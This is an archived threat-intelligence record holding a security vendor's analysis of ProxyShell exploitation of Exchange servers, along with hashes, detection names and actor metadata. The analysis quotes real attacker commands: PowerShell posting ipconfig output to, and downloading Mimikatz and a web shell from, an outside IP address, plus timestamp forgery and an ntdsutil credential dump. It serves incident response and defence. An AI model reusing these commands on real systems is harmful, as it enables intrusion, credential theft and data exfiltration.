{
	"id": "bfb76688-b772-49b7-9f5f-286699dfc1ad",
	"created_at": "2026-04-06T00:16:18.181077Z",
	"updated_at": "2026-04-10T03:33:35.58573Z",
	"deleted_at": null,
	"sha1_hash": "f89b51e087d087102343b45978e81e2371519a82",
	"title": "Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1431801,
	"plain_text": "Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR\r\nBy: Abdelrhman Sharshar, Nov 17, 2021. Read time: 9 min (2465 words)\r\nPublished: 2021-11-17 · Archived: 2026-04-05 17:13:01 UTC\r\nThe Trend Micro™ Managed XDR team recently observed a surge in server-side compromises, ProxyShell-related intrusions on Microsoft Exchange in particular, via the Managed XDR service and other incident response engagements. These compromises, which occurred across different sectors in the Middle East, were most often observed in environments using on-premise implementations of Microsoft Exchange.\r\nIn the engagements where the attacker’s objective was realized, we found that the deployment of ransomware was the most common end goal for the attacks that occurred in the Middle East. This indicates that threat actor groups have begun to favor the use of exploits related to ProxyShell in order to establish initial access to an organization’s systems, with the possibility of ransomware attacks being launched down the line.\r\nUsing intrusion clusters that had overlaps in initial access techniques, we recently found a set of intrusions that were involved with attacks on the Middle East, which we will be dissecting in this blog entry. 
All of these intrusions, which share the commonality of exploiting vulnerable ProxyShell servers to gain an initial foothold on the target’s network, were rooted in an IIS worker process that was spawning suspicious processes.\r\nThrough our observation of the web shell activity on the Trend Micro Vision One platform and by analyzing the process tree created by the Internet Information Services (IIS) process w3wp.exe, we were able to determine the sequence of processes associated with the different attack phases and how they tied in to the threat actor’s objective.\r\nWe clustered all the observed intrusions together to reveal some tactical and operational similarities between the different ransomware affiliates that were deploying the final ransomware payloads. Through the Vision One platform, some intrusions were interrupted early in the infection chain, after which we compared these to other similar intrusions to determine the chain of events (and whether LockFile, Conti, or any other ransomware family currently active in the Middle East threat landscape would be deployed as part of the routine).\r\nIn this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive deeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks.\r\nObservations on the ProxyShell Exploitation\r\nThe exploitation of ProxyShell in these attacks involves three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 — the first two were patched in July 2021, while the latter was fixed in May 2021. 
Successful exploitation of these vulnerabilities can lead to arbitrary file writes that an attacker can leverage to upload web shells to a target Exchange server.\r\nThe malicious actor initially tried to start the attack by scanning for dropped web shells, which we assume were dropped earlier via vulnerability exploitation. This part failed, as the files showed a 404 error code when we tried to access them. \r\nFigure 1. Scanning for web shells\r\nThe first vulnerability, CVE-2021-34473, abuses the URL normalization of the Explicit Logon URL, where the login email is removed from the URL if the URL suffix is autodiscover/autodiscover.json. This allows arbitrary backend URL access as the Exchange machine account (NT AUTHORITY\\SYSTEM).\r\nFigure 2. Exploiting CVE-2021-34473\r\nThe Autodiscover service is abused to leak a known user’s distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then abused to leak the user's security identifier (SID).\r\nhttps://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\r\nPage 1 of 10\n\nMicrosoft Exchange has a PowerShell remoting feature that can be used to read and send emails. This functionality cannot be used by NT AUTHORITY\\SYSTEM as it does not have a mailbox; however, when the backend /powershell endpoint is accessed directly using the previous vulnerability, a user identity can be supplied via the X-Rps-CAT query string parameter, which is deserialized and used to restore that user identity (CVE-2021-34523).\r\nThis technique can be used by an attacker to impersonate a local administrator in order to run PowerShell commands.\r\nFigure 3. 
An attacker using the local administrator account administrator@xxxx along with its SID\r\nThe remaining vulnerability, CVE-2021-31207, leverages the New-MailboxExportRequest PowerShell cmdlet in order to export a user mailbox to an arbitrary file location, which can be used to write a web shell on the Exchange server.\r\nFigure 4. Access to the web shell after being imported\r\nThe web shell is imported as mail inside the administrator[@]xxx draft mailbox. It is then exported to c:/inetpub/wwwroot/aspnet_client/puqjc.aspx, after which it is accessed and the requests are returned with 200 status codes.\r\nAn analysis of the file system timeline shows the same: the puqjc.aspx file was created at the same time as the malicious web connection (2:00 PM UTC).\r\nFigure 5. The system timeline showing the creation of the file puqjc.aspx\r\nPost-exploitation routines\r\nA web shell is a piece of code written in a web development programming language (e.g., ASP, JSP) that attackers can drop into web servers to gain remote access and the ability to execute arbitrary code and commands to meet their objectives. Once a web shell is successfully inserted into the victim’s server, it can allow remote attackers to perform various tasks, such as stealing data or dropping other malicious tools.\r\nUpon analysis of the intrusion clusters, we were able to identify several variants of web shells used by different threat actors. The scanning and exploitation phases were the same in all the incidents, but the post-exploitation activities and their impact varied.\r\nThe following subsections go into the specifics of the post-exploitation routines we analyzed in four separate incidents that occurred in August and September 2021. While some of the incidents shared certain behaviors during infection, their post-exploitation routines varied.\r\nFigure 6. 
Code showing the exec_code query parameter\r\nIn the first incident we handled, we discovered that the web shell employed in the attack uses the exec_code query parameter to execute ASP code. After successfully reaching its command-and-control (C\u0026C) server, it executed commands to gather basic information on the compromised system:\r\n\"c:\\windows\\system32\\cmd.exe\" /c whoami\r\n\"c:\\windows\\system32\\cmd.exe\" /c ping -n 1 google.com\r\nFurthermore, the web shell also executed PowerShell commands, and downloaded and executed other malware.\r\nFigure 7. Executing PowerShell commands and downloading other malware\r\nThe web shell includes a script that kills security software from specific vendors, and then disables the system’s firewall.\r\nFigure 8. Code showing how the script terminates security software\r\nIt then executes a base64-encoded PowerShell script that downloads another obfuscated PowerShell script, which it then executes. This script is part of the Cobalt Strike malware family, which has the ability to provide backdoor access to infected machines.\r\nFigure 9. Decoded PowerShell command to download and execute Cobalt Strike\r\nFigure 10. Code from the Cobalt Strike obfuscated PowerShell\r\nWe also noticed that the malicious actor behind the attack executed scripts to kill specific processes and to clear the PowerShell Windows event log.\r\nFigure 11. Script designed to kill PowerShell-related processes\r\nThe IP addresses 212.84.32[.]13 and 103.25.196[.]33 are servers using the Liferay content management system (CMS). It seems that these are compromised instances of the software and are being used to host the post-exploitation malicious payloads on ports other than the default ones (80, 443, 8080) used by the CMS. 
\r\nFigure 12. Properties of the Liferay CMS versions found on the IP addresses 212.84.32[.]13 and 103.25.196[.]33\r\nBoth servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).\r\nIncident #2\r\nSimilar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.\r\nOur analysis shows that a Wget request was sent to a URL with a high-numbered port. Unfortunately, we do not have information as to what was downloaded, since the URL was already dead by the time of analysis.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK\r\nThe following commands were executed in order to gather basic system information:\r\ncmd.exe /c ipconfig\r\ncmd.exe /c dir\r\n\"c:\\windows\\system32\\cmd.exe\" /c ping -n 1 google.com\r\n\"c:\\windows\\system32\\cmd.exe\" /c whoami\r\nThe web shell was then copied and the original entry deleted using the following commands:\r\ncmd.exe /c ren C:\\inetpub\\wwwroot\\aspnet_client\\errorFF.aspx.req errorFF.aspx\r\n\"c:\\windows\\system32\\cmd.exe\" /c del \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorFF.aspx.req\"\r\nThe output of the ipconfig command was then posted to a remote server via a wget request. The following code shows the PowerShell-encoded (top) and decoded (bottom) commands:\r\n\"c:\\windows\\system32\\cmd.exe\" /c powershell.exe -exec bypass 
-enc\r\nJAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0A\r\n$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType \"application/octet-stream\"\r\nMimikatz, a tool that allows users to view and save credentials and is often used for post-exploitation activities, was downloaded by PowerShell, as shown with the following encoded (top) and decoded (bottom) commands:\r\n\"c:\\windows\\system32\\cmd.exe\" /c powershell -exec bypass -enc\r\nSQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIA\r\nInvoke-WebRequest -Uri \"http://91.92.136.250:443/mimi.exe\" -OutFile \"c:\\windows\\temp\\mimi.exe\"\r\nThe web shell then downloaded an additional .aspx web shell and timestamped it to further disguise itself in the system, as seen in the following code:\r\nInvoke-WebRequest -Uri \"http://91.92.136.250:443/out.aspx\" -OutFile \"c:\\windows\\temp\\OutlookCM.aspx\"\r\nThe web shell was then moved to the OWA directory and its timestamps copied from an existing file, as shown in the following commands:\r\n$f1=(Get-Item 'C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookCM.aspx'); $f2=(Get-Item 'C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookCN.aspx');\r\n$f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;\r\nAfter a few minutes, additional DLLs were created, which were later verified to be web shell files created either by w3wp.exe or UMWorkerProcess.exe:\r\nc:\\windows\\microsoft.net\\framework64\\v4.0.30319\\temporary asp.net files\\owa\\8e05b027\\e164d61b\\app_web_ffhsdhdi.dll\r\nc:\\windows\\microsoft.net\\framework64\\v4.0.30319\\temporary asp.net files\\owa\\8e05b027\\e164d61b\\app_web_m123qbjp.dll\r\nIn relation to this incident, we found that the following malicious components and malware were used:\r\nOutlookCM.aspx 
(Trojan.ASP.WEBSHELL.CJ)\r\nApp_Web_ffhsdhdi.dll (Trojan.Win32.WEBSHELL.EQWO)\r\nApp_Web_m123qbjp.dll (Trojan.Win32.WEBSHELL.EQWO)\r\nOther web shells\r\nDuring our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.NET page, which is quite unusual since most web shells that we find are written in PHP instead. This is similar to the bespoke web shell the KRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version in the same system.\r\nFigure 13. The web shell written in C#\r\nFigure 14. C# web shell function which executes the Base64-encoded command in CMD\r\nFigure 15. The web shell responds to known inputs only; otherwise it responds with error code 404\r\nIncident #3\r\nThe third incident was different from the first two in terms of credential dumping techniques and lateral movement within the system. In this case, the Microsoft Process Dump tool (ProcDump) was used to dump LSASS and extract the hashes.\r\nFigure 16. The execution of procdump.exe during the active attack\r\nThe Windows utility PsExec was detected during the lateral movement phase. The attacker used it to access remote machines and servers in order to drop and execute a new backdoor malware.\r\nA pass-the-hash technique was used to access remote servers and machines, after which a new malware component was dropped in order to create persistence. \r\nFigure 17. 
Using a pass-the-hash technique for remote access\r\nThe following malware was dropped on the infected machines:\r\nCacheTask.dll (Backdoor.Win32.COTX.A)\r\ndllhost.exe (PUA.Win64.LanGO.B)\r\nHostDLL.exe (Trojan.Win64.OGNHOST.A)\r\nPersistence was then created on the remote machines via a scheduled task to keep the backdoor running.\r\nFigure 18. Creating persistence via a scheduled task\r\nIncident #4\r\nWe analyzed a fourth incident that had an interesting technique for credential dumping, specifically, dumping the Active Directory database via the NT Directory Service Utility (ntdsutil):\r\n\"C:\\Windows\\system32\\cmd[.]exe\" /c ntdsutil \"activate instance ntds\" ifm \"create full c:\\windows\\temp\\ntd\" quit quit\r\nHere is an example of a post-exploitation routine using the ProxyShell instance. After the web shells are dropped, cmd.exe and powershell.exe are used to execute commands on the affected systems.\r\nFigure 19. Trend Micro Vision One™ console showing the post-exploitation routine using a ProxyShell instance\r\nSecurity recommendations\r\nFor the incidents that we encountered, it should be noted that the affected Microsoft Exchange servers were left unpatched, either knowingly or unknowingly, by their respective IT teams. 
Microsoft had written in August 2021 that patching to the latest cumulative update (CU) or security update (SU) is indeed the first line of defense against threats that exploit vulnerabilities related to ProxyShell.\r\nWhile mitigation controls, such as the implementation of a host-based or network-based intrusion prevention system (HIPS/NIPS), can be applied to these servers, it should be noted that these controls only buy time until actual patching occurs, providing leeway for IT teams to trigger the appropriate change management controls.\r\nIt is also worthwhile to note that a Microsoft Exchange server would still have an active web shell even if it is patched after a successful compromise. This means that servers that have been compromised via vulnerabilities related to ProxyShell should be inspected thoroughly for any malicious activity, since web shells may already exist (and could still be operational). An active web shell can still allow a malicious actor to continue pursuing their chosen objectives, such as ransomware infection, cryptocurrency mining, and data exfiltration.\r\nThe implementation of proper segmentation for publicly exposed servers should always be reviewed, with their behavior (i.e., processes being launched, anti-malware violations, or network traffic profile) being monitored constantly. For example, the observation of internal network scanning, SMB traffic, or other unusual traffic that has not been seen historically can be a sign that the server has been compromised. Earlier this year, Microsoft wrote an excellent guide for hardening web servers against web shell-based attacks.\r\nTrend Micro Solutions\r\nThe capabilities of the Trend Micro Vision One™ platform made both the detection of this attack and our investigation into it possible. 
We took into account metrics from the network and endpoints that would indicate potential exploitation attempts. The Trend Micro Vision One Workbench shows a holistic view of the activities observed in a user’s environment by highlighting important attributes related to the attack.\r\nTrend Micro Managed XDR offers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing a 24/7 service that allows organizations to have one single source of detection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro’s wealth of global threat intelligence.\r\nTrend Micro Detections\r\nProduct Name: Detections\r\nEndpoint Security products (Real Time Scan, Behavior Monitoring): Backdoor.ASP.CHOPPER.ASPGJI; Backdoor.PHP.WEBSHELL.SBJKWQ; Backdoor.ASP.WEBSHELL.UWMAQF; Trojan.ASP.WEBSHELL.GIFCM; Trojan.ASP.CVE202127065.E; Trojan.PS1.COBEACON.SMYXAK-A; TROJ_FRS.VSNW1FH21; Backdoor.Win32.COTX.A; PUA.Win64.LanGO.B; Trojan.Win64.OGNHOST.A; Fileless.AMSI.PSCoBeacon\r\nEndpoint Security (Deep Security IPS): 1011041 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-34473); 1011050 - Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2021-34523); 1011072 - Microsoft Exchange Server Security Feature Bypass Vulnerability (CVE-2021-31207)\r\nNetwork Security (TippingPoint): 39522: Microsoft Exchange Server Autodiscover SSRF Vulnerability (CVE-2021-34473); 39534: HTTP: Microsoft Exchange Server PowerShell Code Execution Vulnerability (CVE-2021-34523); 40057: HTTP: Microsoft Exchange Server Arbitrary File Write Vulnerability (CVE-2021-31207)\r\nNetwork Security (Deep Discovery Inspector, DDI): CVE-2021-34473 - EXCHANGE SSRF EXPLOIT 
- HTTP(REQUEST); CVE-2021-31207 - EXCHANGE EXPLOIT - HTTP(RESPONSE)\r\nSHA256 / Details / Detection Name\r\n428D445BA0354CFE78485A50B52B04A949259D32CA939FCE151AA3DD3F352066 rundll.bat HackTool.BAT.WinDefKiller.C\r\n28356225C68A84A45C603C5E2EA91A1B2B457DB6F056D82B210CA7853F5CD2F8 CacheTask.dll Backdoor.Win32.COTX.A\r\nE3EAC25C3BEB77FFED609C53B447A81EC8A0E20FB94A6442A51D72CA9E6F7CD2 dllhost.exe PUA.Win64.LanGO.B\r\n27CB14B58F35A4E3E13903D3237C28BB386D5A56FEA88CDA16CE01CBF0E5AD8E HostDLL.exe Trojan.Win64.OGNHOST\r\n5154E76030A08795D22B6CB51F6EA735C3C662409286F21A29B4037231F47043 Trojan.PS1.COBEACON.SMYXAK-A\r\nSource: https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html"
	],
	"report_names": [
		"analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "50068c14-343c-4491-b568-df41dd59551c",
			"created_at": "2022-10-25T15:50:23.253218Z",
			"updated_at": "2026-04-10T02:00:05.234464Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Indrik Spider",
				"Evil Corp",
				"Manatee Tempest",
				"DEV-0243",
				"UNC2165"
			],
			"source_name": "MITRE:Indrik Spider",
			"tools": [
				"Mimikatz",
				"PsExec",
				"Dridex",
				"WastedLocker",
				"BitPaymer",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b296f34c-c424-41da-98bf-90312a5df8ef",
			"created_at": "2024-06-19T02:03:08.027585Z",
			"updated_at": "2026-04-10T02:00:03.621193Z",
			"deleted_at": null,
			"main_name": "GOLD DRAKE",
			"aliases": [
				"Evil Corp",
				"Indrik Spider ",
				"Manatee Tempest "
			],
			"source_name": "Secureworks:GOLD DRAKE",
			"tools": [
				"BitPaymer",
				"Cobalt Strike",
				"Covenant",
				"Donut",
				"Dridex",
				"Hades",
				"Koadic",
				"LockBit",
				"Macaw Locker",
				"Mimikatz",
				"Payload.Bin",
				"Phoenix CryptoLocker",
				"PowerShell Empire",
				"PowerSploit",
				"SocGholish",
				"WastedLocker"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9806f226-935f-48eb-b138-6616c9bb9d69",
			"created_at": "2022-10-25T16:07:23.73153Z",
			"updated_at": "2026-04-10T02:00:04.729977Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Blue Lelantos",
				"DEV-0243",
				"Evil Corp",
				"G0119",
				"Gold Drake",
				"Gold Winter",
				"Manatee Tempest",
				"Mustard Tempest",
				"UNC2165"
			],
			"source_name": "ETDA:Indrik Spider",
			"tools": [
				"Advanced Port Scanner",
				"Agentemis",
				"Babuk",
				"Babuk Locker",
				"Babyk",
				"BitPaymer",
				"Bugat",
				"Bugat v5",
				"Cobalt Strike",
				"CobaltStrike",
				"Cridex",
				"Dridex",
				"EmPyre",
				"EmpireProject",
				"FAKEUPDATES",
				"FakeUpdate",
				"Feodo",
				"FriedEx",
				"Hades",
				"IEncrypt",
				"LINK_MSIEXEC",
				"MEGAsync",
				"Macaw Locker",
				"Metasploit",
				"Mimikatz",
				"PayloadBIN",
				"Phoenix Locker",
				"PowerShell Empire",
				"PowerSploit",
				"PsExec",
				"QNAP-Worm",
				"Raspberry Robin",
				"RaspberryRobin",
				"SocGholish",
				"Vasa Locker",
				"WastedLoader",
				"WastedLocker",
				"cobeacon",
				"wp_encrypt"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6c4f98b3-fe14-42d6-beaa-866395455e52",
			"created_at": "2023-01-06T13:46:39.169554Z",
			"updated_at": "2026-04-10T02:00:03.23458Z",
			"deleted_at": null,
			"main_name": "Evil Corp",
			"aliases": [
				"GOLD DRAKE"
			],
			"source_name": "MISPGALAXY:Evil Corp",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434578,
	"ts_updated_at": 1775792015,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f89b51e087d087102343b45978e81e2371519a82.pdf",
		"text": "https://archive.orkl.eu/f89b51e087d087102343b45978e81e2371519a82.txt",
		"img": "https://archive.orkl.eu/f89b51e087d087102343b45978e81e2371519a82.jpg"
	}
}